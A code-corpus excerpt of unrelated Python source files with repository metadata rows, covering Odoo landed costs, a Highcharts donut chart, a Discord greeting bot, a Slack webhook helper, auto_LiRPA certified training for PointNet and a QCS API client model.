# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
class AccountMove(models.Model):
    """Extend vendor bills with links to their landed-cost records and the
    actions to create/view them."""
    _inherit = 'account.move'

    # Landed-cost records created from this vendor bill.
    landed_costs_ids = fields.One2many('stock.landed.cost', 'vendor_bill_id', string='Landed Costs')
    # Computed flag: True only while creating landed costs is still possible.
    landed_costs_visible = fields.Boolean(compute='_compute_landed_costs_visible')

    @api.depends('line_ids', 'line_ids.is_landed_costs_line')
    def _compute_landed_costs_visible(self):
        """Visible only when no landed-cost record exists yet and at least
        one move line is flagged as a landed-cost line."""
        for account_move in self:
            if account_move.landed_costs_ids:
                account_move.landed_costs_visible = False
            else:
                account_move.landed_costs_visible = any(line.is_landed_costs_line for line in account_move.line_ids)

    def button_create_landed_costs(self):
        """Create a `stock.landed.cost` record associated to the account move of `self`, each
        `stock.landed.costs` lines mirroring the current `account.move.line` of self.
        """
        self.ensure_one()
        landed_costs_lines = self.line_ids.filtered(lambda line: line.is_landed_costs_line)

        # (0, 0, vals) command tuples create one cost line per flagged move line.
        landed_costs = self.env['stock.landed.cost'].create({
            'vendor_bill_id': self.id,
            'cost_lines': [(0, 0, {
                'product_id': l.product_id.id,
                'name': l.product_id.name,
                'account_id': l.product_id.product_tmpl_id.get_product_accounts()['stock_input'].id,
                # Convert the line subtotal into the company currency at the bill date.
                'price_unit': l.currency_id._convert(l.price_subtotal, l.company_currency_id, l.company_id, l.move_id.date),
                'split_method': l.product_id.split_method_landed_cost or 'equal',
            }) for l in landed_costs_lines],
        })
        # Open the freshly created record in form view.
        action = self.env["ir.actions.actions"]._for_xml_id("stock_landed_costs.action_stock_landed_cost")
        return dict(action, view_mode='form', res_id=landed_costs.id, views=[(False, 'form')])

    def action_view_landed_costs(self):
        """Open the landed-cost records linked to this bill (list/form/kanban),
        with this bill preset as the default vendor bill."""
        self.ensure_one()
        action = self.env["ir.actions.actions"]._for_xml_id("stock_landed_costs.action_stock_landed_cost")
        domain = [('id', 'in', self.landed_costs_ids.ids)]
        context = dict(self.env.context, default_vendor_bill_id=self.id)
        views = [(self.env.ref('stock_landed_costs.view_stock_landed_cost_tree2').id, 'tree'), (False, 'form'), (False, 'kanban')]
        return dict(action, domain=domain, context=context, views=views)
class AccountMoveLine(models.Model):
    """Extend move lines with the landed-cost flag and its onchange logic."""
    _inherit = 'account.move.line'

    # Related product type; used below to restrict landed costs to services.
    product_type = fields.Selection(related='product_id.type', readonly=True)
    # Whether this invoice line should feed a landed-cost record.
    is_landed_costs_line = fields.Boolean()

    @api.onchange('is_landed_costs_line')
    def _onchange_is_landed_costs_line(self):
        """Mark an invoice line as a landed cost line and adapt `self.account_id`. The default
        value can be set according to `self.product_id.landed_cost_ok`."""
        if self.product_id:
            accounts = self.product_id.product_tmpl_id._get_product_accounts()
            if self.product_type != 'service':
                # Only service products can be landed costs: reset the flag.
                self.account_id = accounts['expense']
                self.is_landed_costs_line = False
            elif self.is_landed_costs_line and self.move_id.company_id.anglo_saxon_accounting:
                # Anglo-saxon accounting books landed costs on the stock input account.
                self.account_id = accounts['stock_input']
            else:
                self.account_id = accounts['expense']

    @api.onchange('product_id')
    def _onchange_is_landed_costs_line_product(self):
        # Default the flag from the product's "Is a Landed Cost" setting.
        if self.product_id.landed_cost_ok:
            self.is_landed_costs_line = True
        else:
            self.is_landed_costs_line = False
| 47.355263 | 130 | 0.674632 | 3,456 | 0.960267 | 0 | 0 | 1,340 | 0.372326 | 0 | 0 | 1,028 | 0.285635 |
217ddb7ab709173147528cb6c585bd4df64516a7 | 4,025 | py | Python | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 370 | 2015-10-07T20:13:10.000Z | 2022-03-31T03:43:17.000Z | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 67 | 2016-03-14T12:18:44.000Z | 2022-02-24T09:24:31.000Z | examples/highcharts/pie-donut.py | Jbrunn/python-highcharts | a4c488ae5c2e125616efad5a722f3dfd8a9bc450 | [
"MIT"
] | 159 | 2016-02-25T15:07:52.000Z | 2022-03-12T13:04:14.000Z | # -*- coding: utf-8 -*-
"""
Highcharts Demos
Donut chart: http://www.highcharts.com/demo/pie-donut
"""
from highcharts import Highchart
H = Highchart(width = 850, height = 400)
# Browser market-share data: one entry per browser family, each carrying a
# 'drilldown' breakdown of its individual versions.  The 'color' strings are
# JavaScript expressions evaluated client-side by Highcharts.
data = [{
    'y': 55.11,
    'color': 'Highcharts.getOptions().colors[0]',
    'drilldown': {
        'name': 'MSIE versions',
        'categories': ['MSIE 6.0', 'MSIE 7.0', 'MSIE 8.0', 'MSIE 9.0'],
        'data': [10.85, 7.35, 33.06, 2.81],
        'color': 'Highcharts.getOptions().colors[0]'
    }
}, {
    'y': 21.63,
    'color': 'Highcharts.getOptions().colors[1]',
    'drilldown': {
        'name': 'Firefox versions',
        'categories': ['Firefox 2.0', 'Firefox 3.0', 'Firefox 3.5', 'Firefox 3.6', 'Firefox 4.0'],
        'data': [0.20, 0.83, 1.58, 13.12, 5.43],
        'color': 'Highcharts.getOptions().colors[1]'
    }
}, {
    'y': 11.94,
    'color': 'Highcharts.getOptions().colors[2]',
    'drilldown': {
        'name': 'Chrome versions',
        'categories': ['Chrome 5.0', 'Chrome 6.0', 'Chrome 7.0', 'Chrome 8.0', 'Chrome 9.0',
                       'Chrome 10.0', 'Chrome 11.0', 'Chrome 12.0'],
        'data': [0.12, 0.19, 0.12, 0.36, 0.32, 9.91, 0.50, 0.22],
        'color': 'Highcharts.getOptions().colors[2]'
    }
}, {
    'y': 7.15,
    'color': 'Highcharts.getOptions().colors[3]',
    'drilldown': {
        'name': 'Safari versions',
        'categories': ['Safari 5.0', 'Safari 4.0', 'Safari Win 5.0', 'Safari 4.1', 'Safari/Maxthon',
                       'Safari 3.1', 'Safari 4.1'],
        'data': [4.55, 1.42, 0.23, 0.21, 0.20, 0.19, 0.14],
        'color': 'Highcharts.getOptions().colors[3]'
    }
}, {
    'y': 2.14,
    'color': 'Highcharts.getOptions().colors[4]',
    'drilldown': {
        'name': 'Opera versions',
        'categories': ['Opera 9.x', 'Opera 10.x', 'Opera 11.x'],
        'data': [ 0.12, 0.37, 1.65],
        'color': 'Highcharts.getOptions().colors[4]'
    }
}]
# Global chart options (pie type, titles, tooltip suffix).
options = {
    'chart': {
        'type': 'pie'
    },
    'title': {
        'text': 'Browser market share, April, 2011'
    },
    'yAxis': {
        'title': {
            'text': 'Total percent market share'
        }
    },
    'plotOptions': {
        'pie': {
            'shadow': False,
            'center': ['50%', '50%']
        }
    },
    'tooltip': {
        'valueSuffix': '%'
    },
}
categories = ['MSIE', 'Firefox', 'Chrome', 'Safari', 'Opera']
# Flatten the nested structure into the two series Highcharts needs:
# browserData for the inner ring, versionsData for the outer ring.
browserData = []
versionsData = []
for i in range(len(data)):
    browserData.append({
        'name': categories[i],
        'y': data[i]['y'],
        'color': data[i]['color']
    })
    drillDataLen = len(data[i]['drilldown']['data'])
    for j in range(drillDataLen):
        # Each version slice is a progressively brighter shade of the
        # browser's base color (brightness decreases with j).
        brightness = 0.2 - (j / drillDataLen) / 5;
        versionsData.append({
            'name': data[i]['drilldown']['categories'][j],
            'y': data[i]['drilldown']['data'][j],
            'color': 'Highcharts.Color(' + data[i]['color'] + ').brighten(' + str(brightness) + ').get()'
        })
H.set_dict_options(options)
H.add_data_set(browserData, 'pie', 'Browsers', size='60%',
dataLabels={
'formatter': 'function () { \
return this.y > 5 ? this.point.name : null;\
}',
'color': 'white',
'distance': -30
})
H.add_data_set(versionsData, 'pie', 'Versions', size='80%',
innerSize='60%',
dataLabels={
'formatter': "function () {\
return this.y > 1 ? '<b>' + this.point.name + ':</b> ' + this.y + '%' : null;\
}"
})
H.htmlcontent | 32.459677 | 115 | 0.429814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,882 | 0.467578 |
217fa2fb2460ab023c2ba02ea8a4fbc0c4e79eb1 | 961 | py | Python | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | computer_firm.py | GYosifov88/Python-Basics | f4290061264aebc417bde4948948e4a64739fec9 | [
"MIT"
] | null | null | null | number_of_computers = int(input())
# The last digit of each rating encodes a quality grade (2..6); the remaining
# digits encode the number of potential sales.  Each grade converts a fixed
# percentage of the potential sales into real ones; grades outside the table
# contribute nothing (matching the original branch chain).
# Fixes: the original carried three dead/stale variables (number_of_sales,
# made_sales, and real_sales, which kept its previous value on unknown grades)
# and duplicated the accumulate logic across five branches.
SALES_PERCENT_BY_GRADE = {2: 0, 3: 50, 4: 70, 5: 85, 6: 100}

counter_sales = 0   # accumulated real sales
total_ratings = 0   # sum of the grade digits, used for the average grade

for _ in range(number_of_computers):
    rating = int(input())
    rating_scale = rating % 10      # grade digit (2..6 are meaningful)
    possible_sales = rating // 10   # potential sales encoded in the rating
    total_ratings += rating_scale
    if rating_scale in SALES_PERCENT_BY_GRADE:
        # Same evaluation order as the original: (sales * percent) / 100.
        counter_sales += possible_sales * SALES_PERCENT_BY_GRADE[rating_scale] / 100

average_rating = total_ratings / number_of_computers
print(f'{counter_sales:.2f}')
print(f'{average_rating:.2f}')
| 25.289474 | 52 | 0.661811 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 45 | 0.046826 |
21803ff77639fb917a3ee0c55d6b108129313c9e | 902 | py | Python | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | cogs/messages.py | abdieg/cirila-bot-discord | e6956213cf42762b0260bd71dab47f3217c21560 | [
"MIT"
] | null | null | null | import discord
import os
import asyncio
from discord.ext import commands
from random import randint
from cogs.libs import Settings
from cogs.libs import Utils
class Messages(commands.Cog):
    """Cog that greets every text-channel message not sent by the bot itself."""

    def __init__(self, bot):
        self.bot = bot

    @commands.Cog.listener()
    async def on_message(self, message):
        """Reply "Hola" to any user message posted in a text channel."""
        channel = message.channel
        # Only react to messages posted in regular text channels.
        if not isinstance(channel, discord.TextChannel):
            return
        # Ignore the bot's own messages so it never replies to itself.
        if str(message.author.id) == str(Settings.CIRILABOTID):
            return
        print("\nAlguien escribio un mensaje")
        print(message.author.name)
        await channel.send("Hola")
def setup(bot):
bot.add_cog(Messages(bot)) | 29.096774 | 59 | 0.645233 | 694 | 0.769401 | 0 | 0 | 607 | 0.672949 | 578 | 0.640798 | 74 | 0.08204 |
218267a67d6b77155bce24d14dba6bc7cf42c90c | 315 | py | Python | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | features/best_move.py | raaahuuulll/chess-concepts | 92fbed433c1270f8235f454bb4f5416e577bf8a6 | [
"Apache-2.0"
] | null | null | null | from features.move import Move
class BestMove(Move):
    """Move subclass representing the engine's best move for a position."""
    # TODO: replace this with an attribute which specifies columns
    @classmethod
    def from_row(cls, row):
        # Alternate constructor: build from a dataframe-like row exposing
        # `fen` and `best_move` attributes.
        return cls(row.fen, row.best_move)
    def features(self, prefix=None):
        # Always namespace features under "best_move"; the caller-supplied
        # prefix is ignored (parameter kept for signature compatibility).
        return super(BestMove, self).features(prefix="best_move")
218374c68202eece0493e23ec9145bf2c5224fa4 | 728 | py | Python | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | util.py | logonod/demoss | c792f6471fc4a30297688db90d221d31d447633a | [
"BSD-2-Clause"
] | null | null | null | import skimage.io
import skimage.transform
import numpy as np
def load_image(path):
    """Load an image, scale it to [0, 1], center-crop to a square and resize
    to 224x224.

    :param path: path of the image file to read
    :return: a (224, 224, 3) float array, or None when the file cannot be
        read or has an unsupported shape.
    """
    try:
        img = skimage.io.imread(path).astype(float)
    # Bug fix: the original bare `except:` also swallowed SystemExit and
    # KeyboardInterrupt; only I/O / decode failures should map to None.
    except Exception:
        return None
    if img is None:
        return None
    # Reject shapes we cannot interpret as a single 2-D image.
    if len(img.shape) < 2:
        return None
    if len(img.shape) == 4:
        return None
    if len(img.shape) == 2:
        # Grayscale: replicate the single channel into three.
        img = np.tile(img[:, :, None], 3)
    if img.shape[2] == 4:
        # Drop the alpha channel.
        img = img[:, :, :3]
    if img.shape[2] > 4:
        return None
    img /= 255.
    # Center-crop to the shortest edge so the final resize does not distort.
    short_edge = min(img.shape[:2])
    yy = int((img.shape[0] - short_edge) / 2)
    xx = int((img.shape[1] - short_edge) / 2)
    crop_img = img[yy:yy + short_edge, xx:xx + short_edge]
    resized_img = skimage.transform.resize(crop_img, [224, 224])
    return resized_img
| 25.103448 | 65 | 0.608516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
21844501c3e337cf2b53931afe55bce1da09fdf2 | 248 | py | Python | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 2 | 2020-03-12T23:44:54.000Z | 2020-04-24T12:59:08.000Z | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 4 | 2020-04-24T12:57:30.000Z | 2020-08-08T14:57:30.000Z | adgbot/slack.py | astrodatagroup/slack-bot | 9e2bf073972c0ac34a76e86746dd77556cdf7451 | [
"MIT"
] | 2 | 2020-08-07T16:33:57.000Z | 2021-10-04T15:26:57.000Z | # -*- coding: utf-8 -*-
__all__ = ["post_message"]
import requests
from . import config
def post_message(message):
    """Post *message* as text to the Slack webhook from config.SLACK_JSON.

    Raises an HTTPError (via raise_for_status) if Slack rejects the request.
    """
    secrets = config.SLACK_JSON
    r = requests.post(secrets["webhook_url"], json=dict(text=message))
    r.raise_for_status()
| 17.714286 | 70 | 0.689516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.201613 |
21854e402e44b3f6ade05c63d51b295cbf536a9f | 10,054 | py | Python | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 9 | 2021-03-31T20:27:50.000Z | 2022-01-07T21:52:47.000Z | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 2 | 2021-06-21T15:38:07.000Z | 2021-11-08T09:10:09.000Z | train_lirpa.py | eth-sri/3dcertify | bb10f339f80149a9ebc7c07d041b2ef222efb394 | [
"Apache-2.0"
] | 4 | 2021-07-17T15:04:14.000Z | 2022-02-09T17:51:39.000Z | import argparse
import multiprocessing
import random
import time
import torch.optim as optim
from auto_LiRPA.eps_scheduler import LinearScheduler, AdaptiveScheduler, SmoothedScheduler, FixedScheduler
from auto_LiRPA.perturbations import *
from auto_LiRPA.utils import MultiAverageMeter
from torch.nn import CrossEntropyLoss
from torch.utils.data import DataLoader
from lirpa_integration import SemanticTransformation
from transformations.twisting import TwistingZ
from relaxations.interval import Interval
from data_processing import datasets
from auto_LiRPA import BoundedModule, BoundedTensor
from pointnet.model import PointNet
from util.argparse import parse_theta
# Command-line interface for certified training / verification of PointNet.
# Parsed eagerly at import time; `args` is consumed by main() below.
parser = argparse.ArgumentParser()
parser.add_argument("--verify", action="store_true", help='verification mode, do not train')
parser.add_argument("--load", type=str, default="", help='Load pretrained model')
parser.add_argument("--device", type=str, default="cuda", choices=["cpu", "cuda"], help='use cpu or cuda')
parser.add_argument("--data", type=str, default="MNIST", choices=["MNIST", "CIFAR"], help='dataset')
parser.add_argument("--seed", type=int, default=100, help='random seed')
parser.add_argument("--eps", type=float, default=0.01, help='Target training epsilon')
parser.add_argument("--bound_type", type=str, default="CROWN-IBP",
                    choices=["IBP", "CROWN-IBP", "CROWN", "CROWN-FAST"], help='method of bound analysis')
parser.add_argument("--model", type=str, default="resnet", help='model name (mlp_3layer, cnn_4layer, cnn_6layer, cnn_7layer, resnet)')
parser.add_argument("--num_epochs", type=int, default=100, help='number of total epochs')
parser.add_argument("--batch_size", type=int, default=256, help='batch size')
parser.add_argument("--lr", type=float, default=5e-4, help='learning rate')
parser.add_argument("--scheduler_name", type=str, default="SmoothedScheduler",
                    choices=["LinearScheduler", "AdaptiveScheduler", "SmoothedScheduler", "FixedScheduler"], help='epsilon scheduler')
parser.add_argument("--scheduler_opts", type=str, default="start=3,length=60", help='options for epsilon scheduler')
parser.add_argument("--bound_opts", type=str, default=None, choices=["same-slope", "zero-lb", "one-lb"],
                    help='bound options')
parser.add_argument("--conv_mode", type=str, choices=["matrix", "patches"], default="matrix")
parser.add_argument("--save_model", type=str, default='')
parser.add_argument("--num_points", type=int, default=64)
parser.add_argument('--pooling', type=str, default='max', choices=['max', 'avg'], help="The pooling function to use")
args = parser.parse_args()
def Train(model, t, loader, eps_scheduler, norm, train, opt, bound_type, method='robust'):
    """Run one epoch of certified (robust) training or evaluation.

    :param model: BoundedModule-wrapped network
    :param t: epoch index, used only for logging
    :param loader: DataLoader yielding (points, _, labels) batches
    :param eps_scheduler: auto_LiRPA epsilon scheduler
    :param norm: perturbation norm (only L-infinity bounds are built here)
    :param train: True to update weights, False for evaluation
    :param opt: optimizer (ignored when train is False)
    :param bound_type: one of "IBP", "CROWN", "CROWN-IBP", "CROWN-FAST"
    :param method: 'robust' for certified loss, 'natural' for plain CE
    """
    num_class = 40
    meter = MultiAverageMeter()
    if train:
        model.train()
        eps_scheduler.train()
        eps_scheduler.step_epoch()
        # Ceil-divide so a partial final batch still counts as a step.
        eps_scheduler.set_epoch_length(int((len(loader.dataset) + loader.batch_size - 1) / loader.batch_size))
    else:
        model.eval()
        eps_scheduler.eval()
    for i, (data, _, labels) in enumerate(loader):
        start = time.time()
        data = data.float()
        labels = labels.squeeze()
        eps_scheduler.step_batch()
        eps = eps_scheduler.get_eps()
        # For small eps just use natural training, no need to compute LiRPA bounds
        batch_method = method
        if eps < 1e-20:
            batch_method = "natural"
        if train:
            opt.zero_grad()
        # generate specifications: margin between the true class and every other class
        c = torch.eye(num_class).type_as(data)[labels].unsqueeze(1) - torch.eye(num_class).type_as(data).unsqueeze(0)
        # remove specifications to self
        I = (~(labels.data.unsqueeze(1) == torch.arange(num_class).type_as(labels.data).unsqueeze(0)))
        c = (c[I].view(data.size(0), num_class - 1, num_class))
        # bound input for Linf norm used only
        data_ub = data + eps
        data_lb = data - eps
        if list(model.parameters())[0].is_cuda:
            data, labels, c = data.cuda(), labels.cuda(), c.cuda()
            data_lb, data_ub = data_lb.cuda(), data_ub.cuda()
        ptb = PerturbationLpNorm(norm=np.inf, eps=eps, x_L=data_lb, x_U=data_ub)
        x = BoundedTensor(data, ptb)
        output = model(x)
        regular_ce = CrossEntropyLoss()(output, labels)  # regular CrossEntropyLoss used for warming up
        meter.update('CE', regular_ce.item(), x.size(0))
        meter.update('Err', torch.sum(torch.argmax(output, dim=1) != labels).cpu().detach().numpy() / x.size(0), x.size(0))
        if batch_method == "robust":
            # Compute a lower bound `lb` on the margins under perturbation,
            # using the requested bound propagation method.
            if bound_type == "IBP":
                lb, ub = model.compute_bounds(IBP=True, C=c, method=None)
            elif bound_type == "CROWN":
                lb, ub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
            elif bound_type == "CROWN-IBP":
                # lb, ub = model.compute_bounds(ptb=ptb, IBP=True, x=data, C=c, method="backward") # pure IBP bound
                # we use a mixed IBP and CROWN-IBP bounds, leading to better performance (Zhang et al., ICLR 2020)
                factor = (eps_scheduler.get_max_eps() - eps) / eps_scheduler.get_max_eps()
                ilb, iub = model.compute_bounds(IBP=True, C=c, method=None)
                if factor < 1e-5:
                    lb = ilb
                else:
                    clb, cub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
                    lb = clb * factor + ilb * (1 - factor)
            elif bound_type == "CROWN-FAST":
                # model.compute_bounds(IBP=True, C=c, method=None)
                lb, ub = model.compute_bounds(IBP=True, C=c, method=None)
                lb, ub = model.compute_bounds(IBP=False, C=c, method="backward", bound_upper=False)
            # Pad zero at the beginning for each example, and use fake label "0" for all examples
            lb_padded = torch.cat((torch.zeros(size=(lb.size(0), 1), dtype=lb.dtype, device=lb.device), lb), dim=1)
            fake_labels = torch.zeros(size=(lb.size(0),), dtype=torch.int64, device=lb.device)
            robust_ce = CrossEntropyLoss()(-lb_padded, fake_labels)
        if batch_method == "robust":
            loss = robust_ce
        elif batch_method == "natural":
            loss = regular_ce
        if train:
            loss.backward()
            eps_scheduler.update_loss(loss.item() - regular_ce.item())
            opt.step()
        meter.update('Loss', loss.item(), data.size(0))
        if batch_method != "natural":
            meter.update('Robust_CE', robust_ce.item(), data.size(0))
            # For an example, if lower bounds of margins is >0 for all classes, the output is verifiably correct.
            # If any margin is < 0 this example is counted as an error
            meter.update('Verified_Err', torch.sum((lb < 0).any(dim=1)).item() / data.size(0), data.size(0))
        meter.update('Time', time.time() - start)
        if i % 50 == 0 and train:
            print('[{:2d}:{:4d}]: eps={:.8f} {}'.format(t, i, eps, meter))
    print('[{:2d}:{:4d}]: eps={:.8f} {}'.format(t, i, eps, meter))
def main(args):
    """Train or verify a PointNet model with auto_LiRPA certified bounds.

    Steps: seed all RNGs, build the model, load ModelNet40, wrap the model
    as a BoundedModule, then either run one verification pass (--verify) or
    the full certified-training loop with per-epoch checkpoints.
    """
    # Make runs reproducible across torch / CUDA / python / numpy RNGs.
    torch.manual_seed(args.seed)
    torch.cuda.manual_seed_all(args.seed)
    random.seed(args.seed)
    np.random.seed(args.seed)

    ## Step 1: Initialize the original model as usual
    model_ori = PointNet(
        number_points=args.num_points,
        num_classes=40,
        pool_function=args.pooling
    )
    if args.load:
        state_dict = torch.load(args.load)
        model_ori.load_state_dict(state_dict)
        print(state_dict)

    ## Step 2: Prepare dataset as usual
    train_data = datasets.modelnet40(num_points=args.num_points, split='train', rotate='z')
    test_data = datasets.modelnet40(num_points=args.num_points, split='test', rotate='none')
    train_data = DataLoader(
        dataset=train_data,
        batch_size=args.batch_size,
        shuffle=True,
        num_workers=4
    )
    test_data = DataLoader(
        dataset=test_data,
        batch_size=args.batch_size,
        shuffle=False,
        num_workers=4
    )
    dummy_input = torch.randn(2, args.num_points, 3)

    ## Step 3: wrap model with auto_LiRPA; dummy_input is only used to trace
    # the computational graph.
    model = BoundedModule(model_ori, dummy_input, bound_opts={'relu': args.bound_opts, 'conv_mode': args.conv_mode}, device=args.device)

    ## Step 4: prepare optimizer, epsilon scheduler and learning rate scheduler
    opt = optim.Adam(model.parameters(), lr=args.lr)
    # Bug fix: this script's parser defines no --norm flag, so `args.norm`
    # raised AttributeError.  Default to L-infinity, which is the norm
    # Train() actually builds bounds for.
    norm = float(getattr(args, 'norm', np.inf))
    lr_scheduler = optim.lr_scheduler.StepLR(opt, step_size=10, gamma=0.5)
    # Security/robustness fix: resolve the scheduler class by explicit lookup
    # instead of eval() on a command-line string.
    scheduler_classes = {
        "LinearScheduler": LinearScheduler,
        "AdaptiveScheduler": AdaptiveScheduler,
        "SmoothedScheduler": SmoothedScheduler,
        "FixedScheduler": FixedScheduler,
    }
    eps_scheduler = scheduler_classes[args.scheduler_name](args.eps, args.scheduler_opts)
    print("Model structure: \n", str(model_ori))

    ## Step 5: start training
    if args.verify:
        # Verification-only mode: fixed epsilon, no gradients, test set only.
        eps_scheduler = FixedScheduler(args.eps)
        with torch.no_grad():
            Train(model, 1, test_data, eps_scheduler, norm, False, None, args.bound_type)
    else:
        timer = 0.0
        for t in range(1, args.num_epochs + 1):
            if eps_scheduler.reached_max_eps():
                # Only decay learning rate after reaching the maximum eps
                lr_scheduler.step()
            print("Epoch {}, learning rate {}".format(t, lr_scheduler.get_lr()))
            start_time = time.time()
            Train(model, t, train_data, eps_scheduler, norm, True, opt, args.bound_type)
            epoch_time = time.time() - start_time
            timer += epoch_time
            print('Epoch time: {:.4f}, Total time: {:.4f}'.format(epoch_time, timer))
            print("Evaluating...")
            with torch.no_grad():
                Train(model, t, test_data, eps_scheduler, norm, False, None, args.bound_type)
            # Checkpoint after every epoch.
            torch.save(model.state_dict(), args.save_model if args.save_model != "" else args.model)
# Script entry point; `args` is parsed at import time above.
if __name__ == "__main__":
    main(args)
| 47.424528 | 136 | 0.647106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,381 | 0.236821 |
2185931a1852d943461e09408575acf28198d271 | 3,684 | py | Python | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 2 | 2021-12-15T23:24:40.000Z | 2022-01-03T01:14:17.000Z | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 3 | 2022-01-10T21:55:13.000Z | 2022-02-22T19:41:01.000Z | qcs_api_client/models/client_application.py | rigetti/qcs-api-client-python | 569cb9fa972dec1a706757374acb3df3ce649ec4 | [
"Apache-2.0"
] | 3 | 2021-12-15T23:24:42.000Z | 2022-01-09T11:16:17.000Z | from typing import Any, Callable, Dict, List, Optional, Type, TypeVar, Union
import attr
from ..models.client_applications_download_link import ClientApplicationsDownloadLink
from ..types import UNSET, Unset
from ..util.serialization import is_not_none
T = TypeVar("T", bound="ClientApplication")
@attr.s(auto_attribs=True)
class ClientApplication:
"""
Attributes:
latest_version (str): Semantic version
name (str):
supported (bool):
details_uri (Union[Unset, str]):
links (Union[Unset, List[ClientApplicationsDownloadLink]]):
minimum_version (Union[Unset, str]): Semantic version
"""
latest_version: str
name: str
supported: bool
details_uri: Union[Unset, str] = UNSET
links: Union[Unset, List[ClientApplicationsDownloadLink]] = UNSET
minimum_version: Union[Unset, str] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self, pick_by_predicate: Optional[Callable[[Any], bool]] = is_not_none) -> Dict[str, Any]:
latest_version = self.latest_version
name = self.name
supported = self.supported
details_uri = self.details_uri
links: Union[Unset, List[Dict[str, Any]]] = UNSET
if not isinstance(self.links, Unset):
links = []
for links_item_data in self.links:
links_item = links_item_data.to_dict()
links.append(links_item)
minimum_version = self.minimum_version
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update(
{
"latestVersion": latest_version,
"name": name,
"supported": supported,
}
)
if details_uri is not UNSET:
field_dict["detailsUri"] = details_uri
if links is not UNSET:
field_dict["links"] = links
if minimum_version is not UNSET:
field_dict["minimumVersion"] = minimum_version
field_dict = {k: v for k, v in field_dict.items() if v != UNSET}
if pick_by_predicate is not None:
field_dict = {k: v for k, v in field_dict.items() if pick_by_predicate(v)}
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
latest_version = d.pop("latestVersion")
name = d.pop("name")
supported = d.pop("supported")
details_uri = d.pop("detailsUri", UNSET)
links = []
_links = d.pop("links", UNSET)
for links_item_data in _links or []:
links_item = ClientApplicationsDownloadLink.from_dict(links_item_data)
links.append(links_item)
minimum_version = d.pop("minimumVersion", UNSET)
client_application = cls(
latest_version=latest_version,
name=name,
supported=supported,
details_uri=details_uri,
links=links,
minimum_version=minimum_version,
)
client_application.additional_properties = d
return client_application
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| 31.758621 | 106 | 0.628664 | 3,354 | 0.910423 | 0 | 0 | 3,381 | 0.917752 | 0 | 0 | 447 | 0.121336 |
2186641f0d4ffce02d56535a8ecd616ced38432d | 73 | py | Python | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Configuration/Eras/python/Modifier_run2_GEM_2017_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
run2_GEM_2017 = cms.Modifier()
| 18.25 | 40 | 0.808219 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2187970fb1dec3395b976692b9ba5465f2f484c3 | 16,792 | py | Python | d4rl/carla/data_collection_agent_lane.py | chappers/d4rl | b838da60b51c98c1d673a81657f58a44ccf5d3fe | [
"Apache-2.0"
